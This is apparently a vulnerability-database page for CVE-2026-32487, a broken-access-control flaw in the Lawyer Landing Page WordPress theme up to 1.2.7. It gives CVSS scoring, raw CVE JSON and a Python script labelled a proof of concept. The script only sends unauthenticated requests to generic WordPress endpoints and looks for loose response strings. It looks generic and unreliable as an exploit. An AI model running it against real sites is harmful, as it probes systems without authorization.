Security Vulnerability Report
中文
CVE-2026-32487 CVSS 5.3 MEDIUM

CVE-2026-32487

Published: 2026-03-13 19:55:09
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Lawyer Landing Page lawyer-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Lawyer Landing Page: from n/a through <= 1.2.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Lawyer Landing Page <= 1.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32487 PoC - Missing Authorization in Lawyer Landing Page # Target: WordPress site with Lawyer Landing Page theme <= 1.2.7 target_url = "http://target-wordpress-site.com" # Define endpoints that should require authorization endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wp/v2/settings", "/wp-admin/admin.php?page=lawyer_landing_page_settings", ] def check_unauthorized_access(url): """Check if the endpoint can be accessed without authentication""" try: response = requests.get(url, timeout=10) if response.status_code == 200: # Check if sensitive data is returned if '"status":"ok"' in response.text or '"authenticated":true' in response.text: return True except requests.exceptions.RequestException: pass return False def exploit_cve(): """Exploit CVE-2026-32487 - Broken Access Control""" vulnerable_endpoints = [] for endpoint in endpoints: url = target_url + endpoint if check_unauthorized_access(url): vulnerable_endpoints.append(endpoint) if vulnerable_endpoints: print(f"[+] CVE-2026-32487 VULNERABLE ENDPOINTS FOUND:") for ep in vulnerable_endpoints: print(f" - {ep}") else: print("[-] No vulnerable endpoints found") if __name__ == "__main__": exploit_cve()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32487", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:09.110", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Lawyer Landing Page lawyer-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Lawyer Landing Page: from n/a through <= 1.2.7."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en raratheme Lawyer Landing Page lawyer-landing-page permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Lawyer Landing Page: desde n/a hasta &lt;= 1.2.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/lawyer-landing-page/vulnerability/wordpress-lawyer-landing-page-theme-1-2-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}